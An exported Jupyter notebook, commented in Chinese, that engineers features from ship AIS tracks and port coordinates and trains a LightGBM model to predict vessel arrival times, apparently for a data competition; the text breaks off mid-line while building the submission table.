In[18]:\n\n\n#获取起始点和终点岗口\ndef get_pot(df):\n df['start_pot'] = df['TRANSPORT_TRACE'].str.split('-').apply(lambda x:x[0])\n df['end_pot'] = df['TRANSPORT_TRACE'].str.split('-').apply(lambda x:x[-1])\n return df\ntrain = get_pot(data1)\ntrain['timestamp'] = train['timestamp'].astype('str')\ntrain = reduce_mem(train)\ntest = get_pot(test)\ntrain1 = get_pot(train1)\ndel data1\ngc.collect()\n\n\n# ### 将起点和终点港口多名称的进行统一,并选取与test相同起始和终点的数据\n\n# In[19]:\n\n\nhk=['HONGKONG','CNHKG','HKHKG','HKG','HONG KONG_HONG KONG','CNSHK']\nsz=['CNDCB','CNNSA','YANTIAN','SZX','SHEKOU','CNYTN','YTN','CNCWN','CNSHK','DEHAM','HON']\nfos=['FRFOS','FOS']\nbey=['LBBEY','BEY']\ntnc=['ESALG','TNTUN','MAPTM']\n\n\n# In[20]:\n\n\ntrain.loc[train.end_pot.isin(hk),'end_pot']='CNHKG'\ntrain.loc[train.end_pot.isin(sz),'end_pot']='CNYTN'\ntrain.loc[train.end_pot.isin(fos),'end_pot']='FOS'\ntrain.loc[train.end_pot.isin(tnc),'end_pot']=tnc[0]\ngc.collect()\n\n\n# In[21]:\n\n\ntest.loc[test.end_pot.isin(hk),'end_pot']='CNHKG'\ntest.loc[test.end_pot.isin(sz),'end_pot']='CNYTN'\ntest.loc[test.end_pot.isin(fos),'end_pot']='FOS'\ntest.loc[test.end_pot.isin(tnc),'end_pot']=tnc[0]\ngc.collect()\n\n\n# In[22]:\n\n\ntrain1.loc[train1.end_pot.isin(hk),'end_pot']='CNHKG'\ntrain1.loc[train1.end_pot.isin(sz),'end_pot']='CNYTN'\ntrain1.loc[train1.end_pot.isin(fos),'end_pot']='FOS'\ntrain1.loc[train1.end_pot.isin(tnc),'end_pot']=tnc[0]\ngc.collect()\n\n\n# In[23]:\n\n\ntrain['tra'] = train['start_pot'] + '-' + train['end_pot']\ntest['tra'] = test['start_pot'] + '-' + test['end_pot']\ntrain1['tra'] = train1['start_pot'] + '-' + train1['end_pot']\ngc.collect()\n\n\n# In[24]:\n\n\n#获取相同路由数据\ntrain = train[train['tra'].isin(list(test['tra'].value_counts().index))]\n\n\n# ### 获取港口经纬度\n\n# In[25]:\n\n\n#test添加起始港口和终点港口的坐标\nport1 = port[['TRANS_NODE_NAME','LONGITUDE','LATITUDE']].rename(columns={'TRANS_NODE_NAME':'start_pot','LONGITUDE':\n 'start_long','LATITUDE':'start_lat'})\nport2 = port[['TRANS_NODE_NAME','LONGITUDE','LATITUDE']].rename(columns={'TRANS_NODE_NAME':'end_pot','LONGITUDE':\n 'end_long','LATITUDE':'end_lat'})\ntest = test.merge(port1,on='start_pot',how='left')\ntest = test.merge(port2,on='end_pot',how='left')\ndel port1,port2\ngc.collect()\n\n\n# In[26]:\n\n\n#test添加起始港口和终点港口的坐标\nport1 = port[['TRANS_NODE_NAME','LONGITUDE','LATITUDE']].rename(columns={'TRANS_NODE_NAME':'start_pot','LONGITUDE':\n 'start_long','LATITUDE':'start_lat'})\nport2 = port[['TRANS_NODE_NAME','LONGITUDE','LATITUDE']].rename(columns={'TRANS_NODE_NAME':'end_pot','LONGITUDE':\n 'end_long','LATITUDE':'end_lat'})\ntrain1 = train1.merge(port1,on='start_pot',how='left')\ntrain1 = train1.merge(port2,on='end_pot',how='left')\ndel port1,port2\ngc.collect()\n\n\n# In[27]:\n\n\nport1 = port[['TRANS_NODE_NAME','LONGITUDE','LATITUDE']].rename(columns={'TRANS_NODE_NAME':'start_pot','LONGITUDE':\n 'start_long_1','LATITUDE':'start_lat_1'})\nport2 = port[['TRANS_NODE_NAME','LONGITUDE','LATITUDE']].rename(columns={'TRANS_NODE_NAME':'end_pot','LONGITUDE':\n 'end_long_1','LATITUDE':'end_lat_1'})\ntrain = train.merge(port1,on='start_pot',how='left')\ntrain = train.merge(port2,on='end_pot',how='left')\ndel port1,port2\ngc.collect()\n\n\n# In[28]:\n\n\n#train添加起始港口和终点港口的坐标\ntmp=train.drop_duplicates('loadingOrder',keep='last')\ntmp = tmp[['loadingOrder','longitude','latitude']].rename(columns={'longitude':\n 'end_long','latitude':'end_lat'})\ntmp1=train.drop_duplicates('loadingOrder',keep='first')\ntmp1 = tmp1[['loadingOrder','longitude','latitude']].rename(columns={'longitude':\n 'start_long','latitude':'start_lat'})\ntrain = train.merge(tmp,on='loadingOrder',how='left')\ntrain = train.merge(tmp1,on='loadingOrder',how='left')\ntrain = reduce_mem(train)\ngc.collect()\n\n\n# In[29]:\n\n\ntrain = train.loc[train['start_long'].notnull()]\ntrain = train.loc[train['start_lat'].notnull()]\ntrain = train.loc[train['end_long'].notnull()]\ntrain = train.loc[train['end_lat'].notnull()]\ngc.collect()\n\n\n# In[30]:\n\n\ntrain = train.loc[(abs(train['start_long'] - train['start_long_1'])+abs(train['start_lat'] - train['start_lat_1']))<5] \ntrain = train.loc[(abs(train['end_long'] - train['end_long_1'])+abs(train['end_lat'] - train['end_lat_1']))<5]\ndel train['start_long_1'],train['start_lat_1'],train['end_long_1'],train['end_lat_1']\ntrain = reduce_mem(train)\ngc.collect()\n\n\n# In[31]:\n\n\n#将A榜测试数据加入到训练数据中一起构建特征\ndel train1['onboardDate']\ntrain = pd.concat([train,train1],axis=0).reset_index(drop=True)\n\n\n# ### 根据数据中的路由特征按照中间港近似得到船的航行路程\n\n# In[32]:\n\n\nport3 = pd.read_csv('./data/port_3.csv')\n\n\n# In[33]:\n\n\n#将数据按照路由长度分开\ndef get_int(df):\n df['longitude1'] = df['longitude'].astype(int) // 3 * 3\n df['latitude1'] = df['latitude'].astype(int) // 3 * 3\n return df\n#两路由的数据每个点的前一个和后一个港就是首尾港\ndef get_2_trace(df):\n df['pre_pot'] = df['start_pot']\n df['next_pot'] = df['end_pot']\n df['pre_gap'] = 0\n df['next_gap'] = 0\n df['pre_long_gap'] = 0\n df['pre_lat_gap'] = 0\n df['next_long_gap'] = 0\n df['next_lat_gap'] = 0\n return df\ntrain = get_int(train)\ntest = get_int(test)\ntrain_1 = train[train['len']==2].reset_index(drop=True)\ntrain_2 = train[train['len']>2].reset_index(drop=True)\ntest_1 = test[test['len']==2].reset_index(drop=True)\ntest_2 = test[test['len']>2].reset_index(drop=True)\ntrain_1 = get_2_trace(train_1)\ntest_1 = get_2_trace(test_1)\ngc.collect()\n\n\n# In[34]:\n\n\nimport operator\n#获取当前点的前后港口\ndef get_cur_port(df): \n data1 = pd.DataFrame()\n df1 = df.drop_duplicates(['TRANSPORT_TRACE','longitude1','latitude1']).reset_index(drop=True)\n for i in df1.index:\n tmp = df1.iloc[i:i+1]\n l1 = list(list(tmp.TRANSPORT_TRACE.value_counts().index).pop().split('-'))\n c = dict()\n d = []\n for j in l1:\n if j not in list(port3['TRANS_NODE_NAME'].value_counts().index):\n l1.remove(j)\n l2 = l1\n if len(l2)<2:\n continue\n for k in range(len(l2)):\n c[k] = (abs(port3[port3['TRANS_NODE_NAME']==l2[k]].LONGITUDE.values-tmp.longitude.values)+\n abs(port3[port3['TRANS_NODE_NAME']==l2[k]].LATITUDE.values - tmp.latitude.values))\n C = sorted(c.items(),key=operator.itemgetter(1))\n a = C[0][0]\n b = C[1][0]\n if a > b:\n a,b = b,a\n tmp['pre_pot'] = l2[a]\n tmp['next_pot'] = l2[b]\n s1 = ''\n s2 = ''\n for i in l2[:a+1]:\n s1 += '-'+i\n for i in l2[b:]:\n s2 += '-'+i\n tmp['pre_trace'] = s1[1:]\n tmp['next_trace'] = s2[1:]\n data1 = pd.concat([data1,tmp],axis=0)\n del tmp\n return data1\ntest2 = get_cur_port(test_2)\ntest2 = test2[['TRANSPORT_TRACE','longitude1','latitude1','pre_pot','next_pot','pre_trace','next_trace']]\ntest_2 = test_2.merge(test2,on=['TRANSPORT_TRACE','longitude1','latitude1'],how='left')\ntrain2 = get_cur_port(train_2)\ntrain2 = train2[['TRANSPORT_TRACE','longitude1','latitude1','pre_pot','next_pot','pre_trace','next_trace']]\ntrain_2 = train_2.merge(train2,on=['TRANSPORT_TRACE','longitude1','latitude1'],how='left')\ngc.collect()\n\n\n# In[35]:\n\n\n#获取前后的距离差值\ndef get_pre_next_gap(df):\n df1 = df.drop_duplicates(['TRANSPORT_TRACE','pre_pot','next_pot']).reset_index(drop=True)\n merge_gap = pd.DataFrame()\n for i in df1.index:\n tmp = df1.iloc[i:i+1]\n c = d = 0\n d_long = d_lat = 0\n d_dis = 0\n c_long = c_lat = 0\n l1 = list(list(tmp.pre_trace.value_counts().index).pop().split('-'))\n l2 = list(list(tmp.next_trace.value_counts().index).pop().split('-'))\n if len(l1)>1:\n for k in range(len(l1)-1):\n if k+1 <= len(l1)-1:\n d += (abs(port3[port3['TRANS_NODE_NAME']==l1[k+1]].LONGITUDE.values - port3[port3['TRANS_NODE_NAME']==l1[k]].LONGITUDE.values)+\n abs(port3[port3['TRANS_NODE_NAME']==l1[k+1]].LATITUDE.values - port3[port3['TRANS_NODE_NAME']==l1[k]].LATITUDE.values))\n d_long += abs(port3[port3['TRANS_NODE_NAME']==l1[k+1]].LONGITUDE.values - port3[port3['TRANS_NODE_NAME']==l1[k]].LONGITUDE.values)\n d_lat += abs(port3[port3['TRANS_NODE_NAME']==l1[k+1]].LATITUDE.values - port3[port3['TRANS_NODE_NAME']==l1[k]].LATITUDE.values)\n #d_dis += distance(port3[port3['TRANS_NODE_NAME']==l1[k]].LATITUDE.values,port3[port3['TRANS_NODE_NAME']==l1[k+1]].LATITUDE.values,\n #port3[port3['TRANS_NODE_NAME']==l1[k]].LONGITUDE.values,port3[port3['TRANS_NODE_NAME']==l1[k+1]].LONGITUDE.values)\n else:\n d = 0\n d_long = 0\n d_lat = 0\n #d_dis = 0\n tmp['pre_gap'] = d\n tmp['pre_long_gap'] = d_long\n tmp['pre_lat_gap'] = d_lat\n #tmp['pre_distance'] = d_dis\n if len(l2)>1:\n for k in range(len(l2)-1):\n if k+1 <= len(l2)-1:\n c += (abs(port3[port3['TRANS_NODE_NAME']==l2[k+1]].LONGITUDE.values - port3[port3['TRANS_NODE_NAME']==l2[k]].LONGITUDE.values)+\n abs(port3[port3['TRANS_NODE_NAME']==l2[k+1]].LATITUDE.values - port3[port3['TRANS_NODE_NAME']==l2[k]].LATITUDE.values))\n c_long += abs(port3[port3['TRANS_NODE_NAME']==l2[k+1]].LONGITUDE.values - port3[port3['TRANS_NODE_NAME']==l2[k]].LONGITUDE.values)\n c_lat += abs(port3[port3['TRANS_NODE_NAME']==l2[k+1]].LATITUDE.values - port3[port3['TRANS_NODE_NAME']==l2[k]].LATITUDE.values)\n else:\n c = 0\n c_long = 0\n c_lat = 0\n tmp['next_gap'] = c\n tmp['next_long_gap'] = c_long\n tmp['next_lat_gap'] = c_lat\n merge_gap = pd.concat([merge_gap,tmp],axis=0)\n return merge_gap\ntest_merge_gap = get_pre_next_gap(test_2)\ntest_merge_gap = test_merge_gap[['TRANSPORT_TRACE','pre_pot','next_pot','pre_gap','next_gap','pre_long_gap','pre_lat_gap','next_long_gap','next_lat_gap']]\ntest_2 = test_2.merge(test_merge_gap,on=['TRANSPORT_TRACE','pre_pot','next_pot'],how='left')\ndel test_merge_gap\ndel test_2['pre_trace'],test_2['next_trace']\ntrain_merge_gap = get_pre_next_gap(train_2)\ntrain_merge_gap = train_merge_gap[['TRANSPORT_TRACE','pre_pot','next_pot','pre_gap','next_gap','pre_long_gap','pre_lat_gap','next_long_gap','next_lat_gap']]\ntrain_2 = train_2.merge(train_merge_gap,on=['TRANSPORT_TRACE','pre_pot','next_pot'],how='left')\ndel train_merge_gap\ndel train_2['pre_trace'],train_2['next_trace']\n\n\n# In[36]:\n\n\ntrain = pd.concat([train_1,train_2],axis=0).reset_index(drop=True)\ntest = pd.concat([test_1,test_2],axis=0).reset_index(drop=True)\ndef get_gap(df):\n #将前后港口的经纬度merge进去,用当前的与其相减得到到前后港的距离\n port1 = port3[['TRANS_NODE_NAME','LONGITUDE','LATITUDE']].rename(columns={'TRANS_NODE_NAME':'pre_pot','LONGITUDE':\n 'pre_long','LATITUDE':'pre_lat'})\n port2 = port3[['TRANS_NODE_NAME','LONGITUDE','LATITUDE']].rename(columns={'TRANS_NODE_NAME':'next_pot','LONGITUDE':\n 'next_long','LATITUDE':'next_lat'})\n df = df.merge(port1,on='pre_pot',how='left')\n df = df.merge(port2,on='next_pot',how='left')\n del port1,port2\n df['start_gap'] = (abs(df['longitude']-df['pre_long']) + abs(df['latitude']-df['pre_lat'])) + df['pre_gap']\n df['end_gap'] = (abs(df['longitude']-df['next_long']) + abs(df['latitude']-df['next_lat'])) + df['next_gap']\n #--------------------------------------------------------------------------------------------------------------\n df['start_long_gap'] = abs(df['longitude']-df['pre_long']) + df['pre_long_gap']\n df['start_lat_gap'] = abs(df['latitude']-df['pre_lat']) + df['pre_lat_gap']\n df['end_long_gap'] = abs(df['longitude']-df['next_long']) + df['next_long_gap']\n df['end_lat_gap'] = abs(df['latitude']-df['next_lat']) + df['next_lat_gap']\n #df['have_run_distance'] = distance(df.latitude.values,df.pre_lat.values,df.longitude.values,df.pre_long.values)\n #df['cumsum_distance'] = df['have_run_distance'] + df['pre_distance']\n del df['pre_long'],df['pre_gap'],df['next_long'],df['next_gap'],df['longitude1'],df['latitude1'],df['pre_lat'],df['next_lat']\n del df['pre_long_gap'],df['pre_lat_gap'],df['next_long_gap'],df['next_lat_gap']#,df['have_run_distance'],df['pre_distance']\n return df\ntrain = get_gap(train)\ntest = get_gap(test)\ngc.collect()\n\n\n# In[37]:\n\n\ndef get_all_trace(df): \n #尝试根据路由构建总的经纬度的变化值\n dic1 = dict()\n for i in list(df['TRANSPORT_TRACE'].value_counts().index):\n l1 = list(i.split('-'))\n c = 0\n for j in l1:\n if j not in list(port3['TRANS_NODE_NAME'].value_counts().index):\n l1.remove(j)\n l2 = l1\n for k in range(len(l2)-1):\n if k+1 <= len(l2):\n c += (abs(port3[port3['TRANS_NODE_NAME']==l2[k+1]].LONGITUDE.values - port3[port3['TRANS_NODE_NAME']==l2[k]].LONGITUDE.values)+\n abs(port3[port3['TRANS_NODE_NAME']==l2[k+1]].LATITUDE.values - port3[port3['TRANS_NODE_NAME']==l2[k]].LATITUDE.values))\n dic1[i] = c\n del l1,l2\n for i,v in dic1.items():\n if v > 0:\n dic1[i] = float('%.6f'%v)\n else:\n dic1[i] = 0\n return dic1\nmap_dic_train = get_all_trace(train)\nmap_dic_test = get_all_trace(test)\ntrain['all_gap']=train['TRANSPORT_TRACE'].map(map_dic_train)\ntest['all_gap']=test['TRANSPORT_TRACE'].map(map_dic_test)\n\n\n# ### 特征构建\n\n# In[38]:\n\n\ndef get_data(data, model='train'):\n #转换成时间戳,并且将每个运单按照时间排序\n assert model=='train' or model=='test'\n data.sort_values(['loadingOrder','vesselMMSI','timestamp'],inplace=True)\n if model=='train':\n pass\n# data['vesselNextportETA'] = pd.to_datetime(data['vesselNextportETA'], infer_datetime_format=True) \n else:\n data['onboardDate'] = pd.to_datetime(data['onboardDate'], infer_datetime_format=True)\n data['timestamp'] = pd.to_datetime(data['timestamp'], infer_datetime_format=True) \n return data\ndef get_anchor(df):\n # 转化为360度数\n df['direction']=df['direction'].values/10\n tmp=df.groupby(['loadingOrder','vesselMMSI'])\n df['lat_diff'] = abs(tmp['latitude'].diff(1))\n df['lon_diff'] = abs(tmp['longitude'].diff(1))\n df['speed_diff'] = abs(tmp['speed'].diff(1))\n df['direction_diff']= abs(tmp['direction'].diff(1))\n df['diff_seconds'] = tmp['timestamp'].diff(1).dt.total_seconds()\n ### 这样实际是做了一个采样!! #可以去除重复的记录\n df['anchor'] =((abs(df['lat_diff'])<= 0.03)&(abs(df['lon_diff']) <= 0.03)&(abs(df['speed_diff']) <= 0.3)).astype('int')\n ### 这里标记下船几乎停止的地方\n df['stop']=((abs(df['lat_diff']) <= 0.03)&(abs(df['lon_diff']) <= 0.03)&(abs(df['speed']) <= 1)).astype('int')\n df['delay']=(abs(df['diff_seconds'])>3000).astype('int')\n #diff特征需要除以时间差距\n df['lat_diff'] = df['lat_diff'] / (df['diff_seconds'] / 3600)\n df['lon_diff'] = df['lon_diff'] / (df['diff_seconds'] / 3600)\n df['speed_diff'] = df['speed_diff'] / (df['diff_seconds'] / 3600)\n df['direction_diff'] = df['direction_diff'] / (df['diff_seconds'] / 3600)\n #记录是否停港\n #df['stop']=((abs(df['lat_diff'])<0.02)&(abs(df['lon_diff'])<0.02)&(abs(df['speed'])<10)).astype('int')\n #df['stop_times']=(df['stop']*df['diff_seconds']).cumsum()//3600\n return df\ndef distance(LatA,LatB,LonA,LonB):\n EARTH_RADIUS = 6378.137 # 千米\n def rad(d):\n return d * np.pi/ 180.0\n s=0\n radLatA = rad(LatA)\n radLatB = rad(LatB) \n a = radLatA-radLatB\n b = rad(LonA)-rad(LonB)\n s= 2 * np.arcsin(np.sqrt(np.power(np.sin(a / 2),2)+ np.cos(radLatA) * np.cos(radLatB)*np.power(np.sin(b / 2),2)))\n s=s* EARTH_RADIUS\n # 保留两位小数\n s = np.round(s * 100)/100\n s = s * 1000 # 转换成m\n return s\ndef get_feature(df,model='train'):\n #计算移动方便后面计算轨迹长度 m\n df['move_leng']=distance(df.latitude.values,df.groupby(['loadingOrder','vesselMMSI'])['latitude'\n ].shift(1).values,df.longitude.values,df.groupby(['loadingOrder','vesselMMSI'])['longitude'].shift(1).values) \n #计算下之前的累计距离\n df['cumsum_distance'] = df.groupby(['loadingOrder','vesselMMSI'])['move_leng'].expanding().sum().values\n #-----------------------------------------------------------------------------------------------------------------------\n #计算下之前的船已经行驶的累计距离\n #df['cusum_distance'] = distance(df.start_long_gap.values,df.start_lat_gap.values,df.start_lat.values,df.start_lat.values+df.start_long_gap.values)\n \n #-----------\n df['cusum_direction'] = df.groupby(['loadingOrder','vesselMMSI'])['direction'].expanding().mean().values\n #df['cusum_mean_speed'] = df.groupby('loadingOrder')['speed'].expanding().mean().reset_index(drop=True)\n df['cusum_stop'] = df.groupby('loadingOrder')['stop'].cumsum()\n df['cusum_speed']=df.groupby(['loadingOrder','vesselMMSI'])['speed'].rolling(window=5).mean().values\n #------------------------------------------------------\n df['direction_valc']=df['direction_diff']/df['diff_seconds']#\n df['mean_speed'] = df['move_leng']/(df['diff_seconds']+0.01)\n # 瞬时加速度 m/s2\n df['instant_acc']=df['mean_speed']/(df['diff_seconds']+0.01)\n \n #获取船航行经度和维度的行驶比例和总航行占比\n df['end_long_gap_1'] = abs(df['end_long']-df['longitude'])\n df['end_lat_gap_1'] = abs(df['end_lat']-df['latitude'])\n df['start_long_gap_1'] = abs(df['start_long']-df['longitude'])\n df['start_lat_gap_1'] = abs(df['start_lat']-df['latitude'])\n #df['start_long_ratio'] = abs(df['longitude']-df['start_long']) / abs(df['end_long']-df['start_long'])\n #df['start_lat_ratio'] = abs(df['latitude']-df['start_lat']) / abs(df['end_lat']-df['start_lat'])\n #df['end_long_ratio'] = abs(df['longitude']-df['end_long']) / abs(df['end_long']-df['start_long'])\n #df['end_lat_ratio'] = abs(df['latitude']-df['end_lat']) / abs(df['end_lat']-df['start_lat'])\n #获取总差距\n #df['all_start_gap'] = abs(df['start_long_gap']) + abs(df['start_lat_gap'])\n df['all_start_ratio'] = df['start_gap'] / df['all_gap']\n #df['all_end_gap'] = abs(df['long_gap']) + abs(df['lat_gap'])\n df['all_end_ratio'] = 1 - df['all_start_ratio']\n \n #获取年月日等时间特征\n df['year'] = df['timestamp'].dt.year\n df['month'] = df['timestamp'].dt.month\n df['day'] = df['timestamp'].dt.day\n df['hour'] = df['timestamp'].dt.hour\n df['time'] = df['year'].astype(str)+'-'+df['month'].astype(str)+'-'+df['day'].astype(str)\n \n ## 得到最早的时间\n tmp=df.drop_duplicates(['loadingOrder','vesselMMSI'],keep='first').reset_index(drop=True)\n tmp=tmp[['loadingOrder','vesselMMSI','timestamp','direction']]\n tmp.columns=['loadingOrder','vesselMMSI','start_time','start_direction']\n df=df.merge(tmp,on=['loadingOrder','vesselMMSI'],how='left')\n if model == 'train':\n df['have_run_time']=(df['timestamp']-df['start_time']).dt.total_seconds()\n if model == 'test':\n df['timestamp'] = df['timestamp'].apply(lambda x:x.strftime('%Y/%m/%d %H:%M:%S'))\n df['timestamp'] = pd.to_datetime(df['timestamp'], infer_datetime_format=True)\n df['onboardDate'] = pd.to_datetime(df['onboardDate'], infer_datetime_format=True)\n df['have_run_time'] = (df['timestamp'] - df['onboardDate']).dt.total_seconds()\n df['distanc2taget']=distance(df.latitude.values,df.end_lat.values,df.longitude.values,df.end_long.values)/1000\n df['start_time'] = df['start_time'].dt.year.astype(str) + '-' + df['start_time'].dt.month.astype(str) + '-' + df['start_time'].dt.day.astype(str)\n df['cumsum_mean_speed'] = df['cumsum_distance']/(df['have_run_time']+0.01)\n # 瞬时加速度 m/s2\n df['cumsum_instant_acc']=df['cumsum_mean_speed']/(df['have_run_time']+0.01)\n \n #df['bearing'] = bearing_array(df.latitude.values,df.longitude.values,\n #df.groupby('loadingOrder')['latitude'].shift(1).values,\n #df.groupby('loadingOrder')['longitude'].shift(1).values)\n #df['start_bearing'] = bearing_array(df['start_lat'],df['start_long'],df['latitude'],df['longitude'])\n #df['end_bearing'] = bearing_array(df['latitude'],df['longitude'],df['end_lat'],df['end_long'])\n return df\ndef get_hot(df):\n df['day_tag']=(df.timestamp.dt.year%100)*10000+df.timestamp.dt.month*100+df.timestamp.dt.day\n df = df.merge(hot,on=['day_tag','end_pot'],how='left')\n return df\ndef type_encoding(train_data,test_data):\n ### ----对类别进行编码\n for f in ['TRANSPORT_TRACE','carrierName','vesselMMSI','time','start_time']:\n unique_set=set(train_data[f].unique().tolist()+test_data[f].unique().tolist())\n unique_dict={ f:i for i,f in enumerate(unique_set)}\n test_data[f]=test_data[f].map(unique_dict)\n train_data[f]=train_data[f].map(unique_dict)\n \n # 港口名称编码\n unique_set=set(train_data['start_pot'].unique().tolist()+test_data['start_pot'].unique().tolist()\n +train_data['end_pot'].unique().tolist()+test_data['end_pot'].unique().tolist())\n unique_dict={ f:i for i,f in enumerate(unique_set)}\n for f in ['start_pot','end_pot']:\n test_data[f]=test_data[f].map(unique_dict)\n train_data[f]=train_data[f].map(unique_dict)\n return train_data,test_data\ndef get_label(df):\n #tmp = df.groupby(['loadingOrder','vesselMMSI'])['timestamp'].agg({'time_max':'max'})\n df['endtime'] = pd.to_datetime(df['endtime'], infer_datetime_format=True)\n #df = df.merge(tmp,on=['loadingOrder','vesselMMSI'],how='left')\n df['label'] = (df['endtime'] - df['timestamp']).dt.total_seconds()//3600\n return df\n\n\n# In[39]:\n\n\ntrain = get_data(train,model='train')\ntrain = get_anchor(train)\ntrain = get_feature(train,model='train')\n#train = get_label(train)\ngc.collect()\n\n\n# ### 标签构建\n\n# In[40]:\n\n\n#由于A训练数据已经有ETA所以需要将两个部分数据分开进行标签的构建\ntrain_B = train[~train['loadingOrder'].isin(list(train1['loadingOrder'].value_counts().index))]\ntrain_A = train[train['loadingOrder'].isin(list(train1['loadingOrder'].value_counts().index))]\n\n\n# In[41]:\n\n\n#获取A榜测试集的标签\ntrain1_label = train1_label[['loadingOrder','ETA']].drop_duplicates()\ntrain_A = train_A.merge(train1_label,on='loadingOrder',how='left')\ntrain_A['timestamp'] = pd.to_datetime(train_A['timestamp'], infer_datetime_format=True)\ntrain_A['ETA'] = pd.to_datetime(train_A['ETA'], infer_datetime_format=True) \ntrain_A['label'] = (train_A['ETA'] - train_A['timestamp']).dt.total_seconds()//3600\ndel train_A['ETA']\n\n\n# In[44]:\n\n\n#获取B榜训练数据的标签\ntrain= train_B\ntext = train.loc[abs(train['distanc2taget'])<=50]\nmerge_tabel = text[['loadingOrder','timestamp']].drop_duplicates(['loadingOrder'],keep='first').rename(columns={'timestamp':'endtime'})\ntrain = train.merge(merge_tabel,on=['loadingOrder'],how='left')\ndel merge_tabel\n#train = get_hot(train)\ntrain = get_label(train)\ngc.collect()\n\n\n# In[49]:\n\n\ntrain = train[train['label']>=0]\ndel train['endtime']\ntrain['timestamp'] = train['timestamp'].astype('str')\ntrain = reduce_mem(train)\ngc.collect()\n\n\n# In[50]:\n\n\ntrain_A['timestamp'] = train_A['timestamp'].astype('str')\ntrain = pd.concat([train,train_A],axis=0).reset_index(drop=True)\ndel train_A,train_B\ngc.collect()\n\n\n# In[53]:\n\n\n#test进行特征构建\ntest = get_data(test,model='test')\ntest = get_anchor(test)\ntest = get_feature(test,model='test')\n#test = get_hot(test)\ngc.collect()\n\n\n# In[54]:\n\n\n#labelencode\ntest1 = test.copy()\ntrain,test1 = type_encoding(train,test1)\ngc.collect()\n\n\n# ### 数据集构建与模型训练\n\n# In[ ]:\n\n\nfeatures = [c for c in train.columns if c in['carrierName', 'longitude', 'latitude', 'vesselMMSI', 'speed', 'direction', 'len', 'start_pot', 'end_pot', 'end_long',\n 'end_lat', 'start_long', 'start_lat', 'start_gap', 'end_gap', 'start_long_gap', 'start_lat_gap', 'end_long_gap', 'end_lat_gap', 'lat_diff','anchor','delay',\n 'lon_diff', 'speed_diff', 'direction_diff', 'diff_seconds', 'cusum_direction', 'cusum_speed', 'direction_valc', 'end_long_gap_1','all_gap','cusum_stop',\n 'end_lat_gap_1', 'start_long_gap_1', 'start_lat_gap_1', 'year','month','day', 'start_direction', 'have_run_time','all_start_ratio','all_end_ratio','stop']]#cumsum_stop\nprint(features)\nprint(len(features))\ngc.collect()\n\n\n# In[61]:\n\n\nfrom sklearn.metrics import mean_squared_error,explained_variance_score\nfrom sklearn.model_selection import KFold\nfrom lightgbm.sklearn import LGBMRegressor\ndef mse_score_eval(preds, valid):\n labels = valid.get_label()\n scores = mean_squared_error(y_true=labels, y_pred=preds)\n return 'mse_score', scores, True\n\ndef build_model(train_data, test, pred, label, seed=2099, is_shuffle=True):\n train_pred = np.zeros((train_data.shape[0], ))\n test_pred = np.zeros((test.shape[0], ))\n n_splits = 5\n # Kfold\n fold = KFold(n_splits=n_splits, shuffle=is_shuffle, random_state=seed)\n kf_way = fold.split(train_data[pred])\n # params\n# test_x=np.concatenate([test[pred].values,geohash_test],axis=1)\n # train\n for n_fold, (train_idx, valid_idx) in enumerate(kf_way, start=1):\n train_x, train_y = train_data[pred].iloc[train_idx].values, train_data[label].iloc[train_idx]\n valid_x, valid_y = train_data[pred].iloc[valid_idx].values, train_data[label].iloc[valid_idx]\n# geohash_tr_x,geohash_val_x=geohash_train[train_idx],geohash_train[valid_idx]\n# train_x=np.concatenate([train_x,geohash_tr_x],axis=1)\n# valid_x=np.concatenate([valid_x,geohash_val_x],axis=1)\n \n # 数据加载\n clf=LGBMRegressor( learning_rate=0.5,\n n_estimators=6000,\n boosting_type = 'gbdt',\n objective = 'regression',\n num_leaves=156,\n subsample=0.8,\n njobs=-1,\n max_depth=6,\n reg_lambda=0,\n colsample_bytree=0.8,\n random_state=2019, # 2019\n metric=['mse'])\n \n clf.fit(\n train_x, train_y,\n eval_set=[(valid_x, valid_y)],\n eval_metric=['mse'],\n categorical_feature='auto',\n early_stopping_rounds=100,\n verbose=100) \n \n train_pred[valid_idx] = clf.predict(valid_x, num_iteration=clf.best_iteration_)\n \n \n test_pred += clf.predict(test[pred], num_iteration=clf.best_iteration_)/fold.n_splits\n \n print('mean_squared_error:',mean_squared_error(train_data[label].values,train_pred))\n test['label'] = test_pred\n return test[['loadingOrder', 'label']],clf\n\n\ndef bulid_onetrain(train_data, test,pred= features,label= 'label',seed=1099,est=6000, is_shuffle=True):\n train_x,train_y=train_data[features].values,train_data[label].values\n clf=LGBMRegressor( learning_rate=0.01,\n boosting_type = 'gbdt',\n objective = 'regression',\n n_estimators=est,\n num_leaves=156,\n subsample=0.8,\n njobs=-1,\n max_depth=8,\n reg_lambda=0,\n colsample_bytree=0.8,\n random_state=2019, # 2019\n metric=['mse'])\n\n clf.fit(\n train_x, train_y,\n eval_set=[(train_x, train_y)],\n eval_metric=['mse'],\n categorical_feature='auto',\n verbose=100) \n\n #train_pred= clf.predict(train_x, num_iteration=clf.best_iteration_)\n\n\n test_pred= clf.predict(test[pred], num_iteration=clf.best_iteration_)\n\n #print('mean_squared_error:',mean_squared_error(train_y,train_pred))\n test['label'] = test_pred\n return test[['loadingOrder', 'label']],clf\n#result,clf = build_model(train1, test1,pred= features,label= 'label', is_shuffle=True)\nresult,clf=bulid_onetrain(train, test1,pred= features,label= 'label',est=8000,is_shuffle=True)\n\n\n# ### 根据预测结果获得预测时间\n\n# In[ ]:\n\n\ntest4 = test1.copy()\n\n\n# In[64]:\n\n\n#尝试用最后一条的预测时间\ntest4['onboardDate'] = pd.to_datetime(test4['onboardDate'])\ntest4['timestamp'] = pd.to_datetime(test4['timestamp'])\ntest4['timestamp'] = test4['timestamp'].apply(lambda x:x.strftime('%Y/%m/%d %H:%M:%S'))\ntest4['timestamp'] = pd.to_datetime(test4['timestamp'])\ntest4['ETA']=(test4['timestamp']+test4['label'].apply(lambda x:pd.Timedelta(hours=x))).apply(lambda x:x.strftime('%Y/%m/%d %H:%M:%S'))\ntest4 = test4.drop_duplicates('loadingOrder',keep='last')\ntest4['creatDate'] = pd.datetime.now().strftime('%Y/%m/%d %H:%M:%S')\nresult1 = test4[['loadingOrder', 'timestamp', 'longitude', 'latitude', 'carrierName', 'vesselMMSI', 'onboardDate', 'ETA', 'creatDate']]\n\n\n# In[65]:\n\n\nresult3 = result1[['loadingOrder','ETA']].drop_duplicates('loadingOrder')\ntest3 = pd.read_csv('./data/Btest0711_ALL.csv')\ntest3 = test3.merge(result3,on='loadingOrder',how='left')\ntest3['creatDate'] = pd.datetime.now().strftime('%Y/%m/%d %H:%M:%S')\nresult2 = test3[['loadingOrder', 